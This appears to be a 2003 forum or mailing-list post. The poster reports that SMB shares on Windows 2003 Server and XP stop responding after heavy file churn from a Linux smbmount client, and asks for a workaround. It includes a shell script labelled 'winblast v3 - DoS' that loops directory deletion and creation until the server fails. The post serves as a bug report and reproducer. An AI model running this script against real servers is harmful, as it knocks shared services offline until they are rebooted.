Hello, I've encountered a strange problem mounting a Windows server share. My setup: Debian Linux, smbmount 3.0.0beta2 and Windows 2003 Server. When the client creates and deletes a lot of files on the server, the server suddenly ceases serving, i.e. you can not access files nor list directory contents any more. Example: knoppix:/mnt # ll /mnt/test ls: /mnt/test: Cannot allocate memory The only way to get the server working again is to reboot it. Rebooting the client does not help. If you want to try for yourself, check this shell script. The script will create 1000 directories and then takes turns deleting and re-creating them. There will be no more than those 1000 directories at any time. After having created (and deleted) 3.5 millions directories the server denies access to the share. #!/bin/sh # winblast v3 - DoS on WinXP, Win2003Srv # 2003-12-04 Steve Ladjabi count=0 # using 'pathcount' directories pathcount=1000 echo running \'winblast v3\' with $pathcount files in loop ... while [ 1 ]; do p=$((pathcount*2-1)) stop=$((pathcount-1)) while [ "$p" != "$stop" ]; do dirname=wbst$p # delete old directory if it exists and exit on any error if [ -d $dirname ]; then rmdir $dirname || exit 3 fi; # generating directory and exit on any error mkdir $dirname || exit 1 p=$((p-1)) count=$((count+1)) done; echo $count directories generated ... done; #-- end -- On the server the event log shows an error with event id 2020. Btw, the problem also exists if I use smbmount version 2.2.2 or use Windows XP as server. Any idea on how to work around that problem? Cheers Daniel Kabs Germany